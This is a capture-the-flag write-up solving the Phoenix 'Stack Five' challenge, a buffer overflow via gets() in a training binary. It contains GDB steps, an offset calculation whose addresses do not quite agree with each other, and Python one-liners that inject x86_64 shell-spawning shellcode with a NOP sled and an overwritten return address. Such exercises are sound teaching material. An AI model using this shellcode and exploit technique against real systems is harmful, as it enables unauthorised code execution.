Exploit Education Phoenix : Stack Five

Table of Contents

Exploit Education Phoenix - This article is part of a series.

Part 1: Exploit Education Phoenix : Stack Zero

Part 2: Exploit Education Phoenix : Stack One

Part 3: Exploit Education Phoenix : Stack Two

Part 4: Exploit Education Phoenix : Stack Three

Part 5: Exploit Education Phoenix : Stack Four

Part 6: This Article

Part 7: Exploit Education Phoenix : Stack Six

Part 8: Exploit Education Phoenix : Format Zero

Part 9: Exploit Education Phoenix : Format One

Before you look at the solution to the challenges, I invite you to try it for yourself. You can find all the challenges here.

Overview of the challenge #

The aim of the Phoenix challenges is to analyse the source code of an executable in order to find and exploit a vulnerability. This first series of challenges concerns the stack.

The first thing to do is to analyse the executable’s source code. Looking for a vulnerability to exploit.

char *gets(char *);

void start_level() {
  char buffer[128];
  gets(buffer);
}

int main(int argc, char **argv) {
  printf("%s\n", BANNER);
  start_level();
}

First of all, we notice that unlike the other challenges, this one no longer has a structure. What’s more, the complete_level function that we need to call to complete the challenge is no longer present. As with the previous challenge, the aim of this challenge is to introduce us to the stack overflow technique: return-oriented programming (ROP). However, this time instead of executing the complete_level function we have to execute shellcode to open a shell.

The next thing we notice is the use of the gets function. When we look at the documentation for the function using the command: man gets, it explains how the function works. The gets function retrieves a string of characters from the standard input (stdin), each character is written to a buffer until the function detects an EOF or a line feed. Finally, when one of these characters is detected, it is replaced by a \0 to end the string.

The documentation provides us with new information: this function should no longer be used, as it is sensitive to buffer overflow attacks. The function does not know how many characters it will write to the buffer and cannot be used to limit the number of characters copied. If the number of input characters is greater than the size of the buffer, the gets function will continue to write to the next memory location.

Now that we’ve identified the sensitive parts of the source code, all we have to do is abuse the vulnerability to succeed in the challenge.

Exploiting the vulnerability #

To succeed in this challenge, we need to exploit a buffer overflow vulnerability. This will allow us to change the value of the return address, which will allow us to execute shellcode to open a new shell. To exploit the ROP, we need several parameters that we will use when exploiting the buffer overflow:

Address of buffer vulnerable to buffer overflow
Address of the memory location containing the return address
A x86_64 shellcode that allow us to open a new shell.

Using the buffer address and the memory location containing the return address, we can calculate an offset that will tell us how big our malicious character string should be. Next, we add the address of the start of the buffer to our string of characters in order to rewrite the value of the return address. The shellcode in the buffer will be executed and open the shell.

To find all these parameters, we’ll use GDB.

Offset calculation #

GDB sometimes shifts stack addresses slightly because of environment variables. This can cause problems when testing a vulnerability outside GDB. To fix this you need to remove excess environment variables, you can use the show env command to show environment variables and unset env <var_name> to remove an environment variable. In my case. I had to remove the variables LINES and COLUMNS.

To find the address of the buffer, it is possible to fill the buffer and inspect the stack to find the address. To inspect the stack at the right time, we can place a breakpoint just after the gets function is called in the start_level function.

$ gdb stack-five
$ disass start_level
$ b *0x00000000004005a1
$ run < <(python -c "print 'A'*100")
$ x/100x $rsp

Breakpoint Hit — Breakpoint hit to see the stack.

Thanks to the stack inspection, we now know the buffer address: 0x7FFFFFFFE5E0. In the stack we can also find the address containing the return address. To do this, we disassemble the main function, which calls the start_level function. Then we retrieve the address of the instruction just after the start_level function is called, since this is the address to which the CPU will return after the ret instruction in the start_level function.

$ gdb stack-five
$ disass main

Disassembly main — Disassembly of the `main` function

We now know that the address of the memory location containing the return address is: 0x7FFFFFFFE668, since the instruction address is 0x00000000004005c7 and we find this value in the stack.

We can now calculate the offset between the start of the buffer and the location of the return address: 0x7FFFFFFFE648 - 0x7FFFFFFFE5F0 = 0x88 = 136.

Constructing the malicious string #

We now have all we need to exploit the vulnerability. We can create our malicious string by filling our buffer with a shellcode of 57 bytes that open a shell, then 79 NOP to reach the return address and finally adding the address of the buffer.

I didn’t create the shellcode myself, you can find it here. So credit goes to them for this shellcode..

To make it easier to create the string, we can use Python.

python -c "print '\x48\x31\xc0\x50\x5f\xb0\x03\x0f\x05\x50\x48\xbf\x2f\x64\x65\x76\x2f\x74\x74\x79\x57\x54\x5f\x50\x5e\x66\xbe\x02\x27\xb0\x02\x0f\x05\x50\x48\xbf\x2f\x62\x69\x6e\x2f\x2f\x73\x68\x57\x54\x5f\x50\x57\x54\x5e\x48\x99\xb0\x3b\x0f\x05' + '\x90'*79 + '\xE0\xE5\xFF\xFF\xFF\x7F'" | ./stack-five

Exploit Result — Result of exploiting the vulnerability.

Finally, we can see that we’ve opened a new shell, so we’ve succeeded in our challenge.

Make it better #

There is a more efficient way of avoiding problems with the buffer address: after calling the gets function, the buffer address is in the rax register, since the gets function, if successful, returns the buffer address. So, rather than writing the buffer address to the return address, we can try to find a jmp rax instruction and write the address of this instruction to the return address.

To do this I use Binary Ninja and do a search for the heaxdecimal code FFE0 which corresponds to the jmp rax instruction. We get 2 addresses that point to a jmp rax instruction, for our test we’ll use the address: 0x4004c3.

We can now create our new character string.

$ python -c "print '\x48\x31\xc0\x50\x5f\xb0\x03\x0f\x05\x50\x48\xbf\x2f\x64\x65\x76\x2f\x74\x74\x79\x57\x54\x5f\x50\x5e\x66\xbe\x02\x27\xb0\x02\x0f\x05\x50\x48\xbf\x2f\x62\x69\x6e\x2f\x2f\x73\x68\x57\x54\x5f\x50\x57\x54\x5e\x48\x99\xb0\x3b\x0f\x05' + '\x90'*79 + '\xC3\x04\x40'" | ./stack-five